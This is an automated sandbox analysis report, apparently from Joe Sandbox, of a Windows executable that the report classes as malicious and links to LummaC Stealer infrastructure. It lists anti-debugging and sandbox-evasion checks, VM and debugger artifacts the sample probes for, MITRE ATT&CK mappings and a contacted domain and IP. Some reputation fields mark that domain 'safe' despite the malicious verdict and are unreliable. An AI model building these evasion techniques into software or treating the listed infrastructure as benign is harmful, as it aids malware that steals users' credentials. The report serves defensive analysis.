Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FC66F second address: 7FC67D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F66E8838CE8h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FCE1A second address: 7FCE1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FD4C6 second address: 7FD4CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FD4CA second address: 7FD505 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66E8C719E5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push esi 0x0000000d ja 00007F66E8C719D6h 0x00000013 push eax 0x00000014 pop eax 0x00000015 pop esi 0x00000016 push esi 0x00000017 jmp 00007F66E8C719E2h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FB279 second address: 7FB28A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 jp 00007F66E8838CE6h 0x0000000b pop esi 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FB28A second address: 7FB290 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 802E23 second address: 802E63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66E8838CF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F66E8838CEEh 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 jns 00007F66E8838CEEh 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 802E63 second address: 802E67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 802E67 second address: 802E6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 805DD9 second address: 805DDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 805DDD second address: 805DE3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 805826 second address: 80582F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80582F second address: 805833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8106B2 second address: 8106B8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81382D second address: 813837 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F66E8838CE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 813837 second address: 81383B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81383B second address: 813844 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 813844 second address: 81384C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81384C second address: 81386A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F66E8838CE6h 0x0000000a pop ecx 0x0000000b popad 0x0000000c push ebx 0x0000000d jnl 00007F66E8838CECh 0x00000013 pushad 0x00000014 push eax 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 815F17 second address: 815F1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 815F1F second address: 815F25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 815F25 second address: 815F29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8206CD second address: 8206ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F66E8838CF8h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8206ED second address: 8206F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8206F1 second address: 820705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66E8838CEEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 829A78 second address: 829A87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jbe 00007F66E8C719D6h 0x0000000c pushad 0x0000000d popad 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82C684 second address: 82C68A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83292A second address: 832930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 832930 second address: 832951 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007F66E8838CEAh 0x0000000c jmp 00007F66E8838CEAh 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push esi 0x00000014 pop esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8313E2 second address: 8313E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8313E7 second address: 831419 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop eax 0x00000007 jmp 00007F66E8838CEBh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 jnp 00007F66E8838CE6h 0x0000001b popad 0x0000001c jmp 00007F66E8838CF0h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 831419 second address: 831420 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 831420 second address: 831428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83191C second address: 831922 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 831922 second address: 831928 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 831AAF second address: 831AB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 831AB7 second address: 831ABB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 831C0B second address: 831C1F instructions: 0x00000000 rdtsc 0x00000002 js 00007F66E8C719D6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jp 00007F66E8C719DEh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 835FD9 second address: 835FDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 836159 second address: 836169 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F66E8C719D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 836169 second address: 83616D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83616D second address: 836173 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 836173 second address: 836179 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 836179 second address: 83617D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83AC02 second address: 83AC06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83AC06 second address: 83AC10 instructions: 0x00000000 rdtsc 0x00000002 je 00007F66E8C719D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84138E second address: 8413A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F66E8838CF1h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84852E second address: 848532 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 848532 second address: 84853A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84853A second address: 848540 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 848540 second address: 848544 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 844220 second address: 844224 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 844224 second address: 84424B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66E8838CF9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jc 00007F66E8838CF2h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84424B second address: 844251 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85576D second address: 855784 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66E8838CF2h 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 855784 second address: 855796 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jl 00007F66E8C719E0h 0x0000000d push ecx 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85548B second address: 8554AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F66E8838CE6h 0x0000000e jmp 00007F66E8838CF6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8554AF second address: 8554B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86B794 second address: 86B79E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86B79E second address: 86B7A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86B7A2 second address: 86B7A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86A995 second address: 86A9B5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F66E8C719E2h 0x00000008 jg 00007F66E8C719D6h 0x0000000e je 00007F66E8C719D6h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push ecx 0x00000017 pushad 0x00000018 jne 00007F66E8C719D6h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86E476 second address: 86E47C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86E47C second address: 86E492 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F66E8C719D8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86E492 second address: 86E4A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66E8838CF2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 871399 second address: 8713B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66E8C719E9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 870FB9 second address: 870FCC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66E8838CEFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 872E20 second address: 872E33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F66E8C719DCh 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 5DC8ED instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 77CFCE instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 5DC7E9 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 80889C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe TID: 6300Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: file.exe, file.exe, 00000001.00000002.1446448098.000000000075E000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000001.00000002.1446968605.00000000010E7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1401010991.00000000010E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
Source: file.exe, 00000001.00000003.1401010991.0000000001117000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1407874228.0000000001119000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1446968605.000000000111A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: file.exe, 00000001.00000002.1446448098.000000000075E000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
Source: C:\Users\user\Desktop\file.exeFile opened: SICE
Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort (3 occurrences)
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_005BDF70 LdrInitializeThunk,1_2_005BDF70
Source: file.exe, file.exe, 00000001.00000002.1446448098.000000000075E000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: C}aProgram Manager
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
MITRE ATT&CK matrix (techniques per tactic; a leading number is the count of matched signatures for that technique):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts
Execution: 1 Windows Management Instrumentation; 2 Command and Scripting Interpreter; At; Cron; Launchd
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script
Privilege Escalation: 1 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script
Defense Evasion: 24 Virtualization/Sandbox Evasion; 1 Process Injection; 4 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets
Discovery: 631 Security Software Discovery; 24 Virtualization/Sandbox Evasion; 2 Process Discovery; 223 System Information Discovery; Internet Connection Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging
Command and Control: 11 Encrypted Channel; 2 Non-Application Layer Protocol; 13 Application Layer Protocol; Protocol Impersonation; Fallback Channels
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact
Source | Detection | Scanner | Label
file.exe | 42% | ReversingLabs | Win32.Trojan.Symmi
file.exe | 51% | Virustotal |
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML |
No Antivirus matches
Source | Detection | Scanner | Label
https://property-imper.sbs/api | 60% | Avira URL Cloud | safe
Domains:
Name | IP | Active | Malicious | Antivirus Detection | Reputation
property-imper.sbs | 104.21.33.116 | true | false | | high

Contacted URLs:
Name | Malicious | Antivirus Detection | Reputation
https://property-imper.sbs/api | false | | high

URLs found in memory or binary data:
Name | Source | Malicious | Antivirus Detection | Reputation
https://property-imper.sbs/api6 | file.exe, 00000001.00000002.1447078609.000000000116F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1401010991.0000000001117000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1402955652.000000000116D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://property-imper.sbs/ | file.exe, 00000001.00000003.1401010991.0000000001117000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1407874228.0000000001119000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1402955652.000000000116D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1446968605.000000000111A000.00000004.00000020.00020000.00000000.sdmp | false | | high

Contacted IPs:
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.33.116 | property-imper.sbs | United States | 13335 | CLOUDFLARENETUS | false
        Joe Sandbox version:41.0.0 Charoite
        Analysis ID:1561682
        Start date and time:2024-11-24 04:19:13 +01:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 4m 51s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:7
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:file.exe
        Detection:MAL
        Classification:mal100.evad.winEXE@1/0@1/1
        EGA Information:
        • Successful, ratio: 100%
        HCA Information:Failed
        Cookbook Comments:
        • Found application associated with file extension: .exe
        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
        • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
22:20:24 | API Interceptor | 2x Sleep call for process: file.exe modified
Context for IP 104.21.33.116 (associated samples, all detected as malicious; sample name: threat name):
• file.exe: LummaC Stealer
• file.exe: Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar
• file.exe: LummaC Stealer
• file.exe: Unknown
• file.exe: Unknown
• file.exe: Amadey, Credential Flusher, LummaC Stealer, Stealc
• file.exe: LummaC Stealer
• file.exe: LummaC Stealer
• file.exe: Amadey, Credential Flusher, LummaC Stealer, Stealc
• file.exe: LummaC Stealer
Context for domain property-imper.sbs (associated samples, all detected as malicious; sample name: threat name, resolved IP):
• file.exe: LummaC Stealer (104.21.33.116)
• file.exe: Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar (104.21.33.116)
• file.exe: LummaC Stealer (104.21.33.116)
• file.exe: LummaC Stealer (172.67.162.84)
• file.exe: Unknown (104.21.33.116)
• file.exe: Unknown (104.21.33.116)
• file.exe: Amadey, Credential Flusher, LummaC Stealer, Stealc (104.21.33.116)
• file.exe: LummaC Stealer (104.21.33.116)
• 2fQ8fpTWAP.exe: Amadey, Credential Flusher, LummaC Stealer, Stealc (172.67.162.84)
• file.exe: LummaC Stealer (104.21.33.116)
Context for ASN CLOUDFLARENETUS (associated samples, all detected as malicious; sample name: threat name, contacted IP):
• sparc.nn.elf: Mirai, Okiru (172.65.2.111)
• powerpc.nn.elf: Mirai, Okiru (172.66.116.184)
• x86_64.nn.elf: Mirai, Okiru (1.8.81.73)
• file.exe: LummaC Stealer (104.21.33.116)
• x86_32.nn.elf: Mirai, Okiru (104.29.231.51)
• file.exe: Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar (104.21.33.116)
• file.exe: LummaC Stealer (104.21.33.116)
• 313e4225be01a2f968dd52e4e8c0b9fd08c906289779b.exe: Unknown (104.26.13.205)
• file.exe: LummaC Stealer (172.67.162.84)
• file.exe: Amadey, Stealc, Vidar (172.64.41.3)
Context for JA3 fingerprint a0e9f5d64349fb13191bc781f81f42e1 (associated samples, all detected as malicious; sample name: threat name, contacted IP):
• file.exe: LummaC Stealer (104.21.33.116)
• file.exe: Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar (104.21.33.116)
• file.exe: LummaC Stealer (104.21.33.116)
